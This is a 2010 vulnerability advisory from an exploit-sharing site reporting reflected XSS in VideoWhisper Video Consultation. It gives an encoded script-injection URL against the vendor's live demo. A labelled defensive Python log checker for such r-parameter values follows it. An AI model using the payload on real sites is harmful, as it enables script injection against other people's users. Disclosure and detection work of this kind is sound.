VideoWhisper Video Consultation Xss Vulnerabilities
Posted on 27 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>VideoWhisper Video Consultation Xss Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================
VideoWhisper Video Consultation Xss Vulnerabilities
===================================================

To accomplish great things, we must dream as well as act
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=

AUTHOR : Cur53D
MAIL   : Hyq6xx@gmail.com
DATE   : 27 June 2010
Blog   : www.Cur53D.dlstreet.net
Type   : XSS
Greetz : Sid3^effects,*L0rd CrusAd3r*,D34D F0X TH3 BL4CKH4T And All My Friends
####################################################################################

About The Script:

VideoWhisper Video Consultation is a premium high definition video communication
software designed for online video consultations, interactive live presentations,
trainings, webinars, coaching and online collaboration. It was designed for
few-to-many, two-way moderated video communication. Moderators control which
participant is displayed on the main screen (speaker) and can also add an
additional participant (inquirer) to ask questions or assist. Participants can
change their public status (i.e. request to speak), upload and download room
files, and use text and video chat.

########################################################

This vulnerability affects /consultation/index.php

LIVE DEMO :
####################################################################################
http://www.videowhisper.com/demos/consultation/index.php?r=%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert%28404944702436%29%3B%3C/ScRiPt%3E.
####################################################################################
#Cur53D
# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-27]</pre></body></html>
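A defender's check for the pattern this advisory reports, added here as an example and not code from the advisory or from VideoWhisper: it decodes the `r` parameter of requests to /consultation/index.php in access-log lines and reports values that fail an allowlist, marking those that could leave an HTML attribute or text node. The allowlist pattern, the function names and the log lines are assumptions constructed for illustration; the flagged sample mirrors the shape of the URL in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate room names are short and alphanumeric (plus "_" and "-").
ROOM_ALLOWLIST = re.compile(r"[A-Za-z0-9_-]{1,64}")
# Characters that let a reflected value escape an HTML attribute or text node.
MARKUP_CHARS = set("<>\"'`")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Jun/2010:10:00:00 +0000] "GET /demos/consultation/index.php?r=Room1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [27/Jun/2010:10:00:05 +0000] "GET /demos/consultation/index.php'
    '?r=%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert%281%29%3B%3C/ScRiPt%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [27/Jun/2010:10:00:09 +0000] "GET /other/page.php?r=%3Cb%3E HTTP/1.1" 404 120',
    '203.0.113.4 - - [27/Jun/2010:10:01:00 +0000] "GET /demos/consultation/index.php?r=room%20name HTTP/1.1" 200 512',
]

def room_is_valid(value):
    """Allowlist check to apply server-side before `r` is echoed into a page."""
    return ROOM_ALLOWLIST.fullmatch(value) is not None

def breaks_markup(value):
    """True if the decoded value holds markup delimiters or control characters."""
    return any(ch in MARKUP_CHARS or ord(ch) < 32 for ch in value)

def suspicious_r_values(log_lines, path_suffix="/consultation/index.php"):
    """Return (line_number, decoded_r, breaks_markup) for `r` values failing the allowlist."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(path_suffix):
            continue
        # parse_qs percent-decodes, so %3C, %22, %0A and %0D become real characters
        # and mixed-case tags or embedded line breaks cannot hide from the check.
        for value in parse_qs(url.query, keep_blank_values=True).get("r", []):
            if not room_is_valid(value):
                hits.append((number, value, breaks_markup(value)))
    return hits

if __name__ == "__main__":
    for number, value, markup in suspicious_r_values(SAMPLE_LOG):
        print(f"line {number}: r={value!r} markup_breakout={markup}")
```

Matching on the decoded value against an allowlist, rather than searching for the string `<script>`, is what keeps the mixed-case tag and the encoded line breaks in the reported URL from slipping past.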